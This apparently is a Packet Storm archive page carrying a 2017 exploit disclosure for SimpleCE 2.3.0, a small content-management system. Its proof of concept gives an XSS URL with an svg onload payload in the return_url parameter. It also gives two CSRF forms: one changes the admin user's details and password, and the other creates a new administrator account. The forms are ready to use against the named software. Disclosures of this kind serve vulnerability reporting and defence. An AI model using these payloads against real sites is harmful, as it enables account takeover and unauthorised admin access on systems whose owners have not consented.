what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SimpleCE 2.3.0 Cross Site Request Forgery / Cross Site Scripting

SimpleCE 2.3.0 Cross Site Request Forgery / Cross Site Scripting
Posted Jun 15, 2017
Authored by 8bitsec

SimpleCE version 2.3.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 73f4dbf9aae73e9ed6bd6b715bc4d53973e9ebf611084b48d09ebacdb37362f4

SimpleCE 2.3.0 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
# Exploit Title: SimpleCE 2.3.0 - Multiple Vulnerabilities XSS CSRF
# Date: 2017-06-14
# Exploit Author: 8bitsec
# Vendor Homepage: http://simplece.com
# Software Link: https://codecanyon.net/item/simplece-v2-mini-cms/9140868
# Version: 2.3.0, probably older versions
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-06-14


Product & Service Introduction:
===============================
SimpleCE is a simple Content-Management System with front-end editor mode.

Vulnerability Disclosure Timeline:
==================================
2017-06-13: Vulnerability found.
2017-06-13: Reported to vendor.
2017-06-14: No answer.
2017-06-14: Published.


Technical Details & Description:
================================

Authenticated XSS vulnerability found on http://[server]/[path]/index.php/content/text/1?return_url=[XSS] exploitable as a regular or admin user.
CSRF vulnerability can be exploited to add an administrator or change its info including password.

Proof of Concept (PoC):
=======================

XSS:

http://[server]/[path]/index.php/content/text/1?return_url=<svg/onload=alert(/8bitsec/)>

CSRF:

Modify User:

<form action="http://[server]/[path]/index.php/user/1" autocomplete="off" method="post" accept-charset="utf-8">
<label>Username<input type="text" name="username" id="username" placeholder="Username" value="admin" required="required" /></label>
<label>Email<input type="email" name="email" id="email" placeholder="Email" value="mail@example.com" required="required" /></label>
<label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="John" /></label>
<label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="Doe" /></label>
<label>Password<input type="password" name="password" id="password" placeholder="Password" /></label>
<label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)"/></label>
<button type="submit" name="save" id="save" value="save">save</button>
</form>

Add User:

<form action="http://[server]/[path]/index.php/user/new" autocomplete="off" method="post" accept-charset="utf-8">
<label>Username<input type="text" name="username" id="username" placeholder="Username" value="adminuser" required="required" /></label>
<label>Email<input type="email" name="email" id="email" placeholder="Email" value="a@b.com" required="required" />
<label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="admin" />
<label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="user" /></label>
<label>Password<input type="password" name="password" id="password" placeholder="Password" required="required" /></label>
<label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)" required="required" /></label>
<label for="group">Role<select name="group" id="group" required="required">
<option value="2" >User</option>
<option value="1" selected="selected">Admin</option>
</select>
</label>
<button type="submit" name="save" id="save" value="save">save</button>
</form>


Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close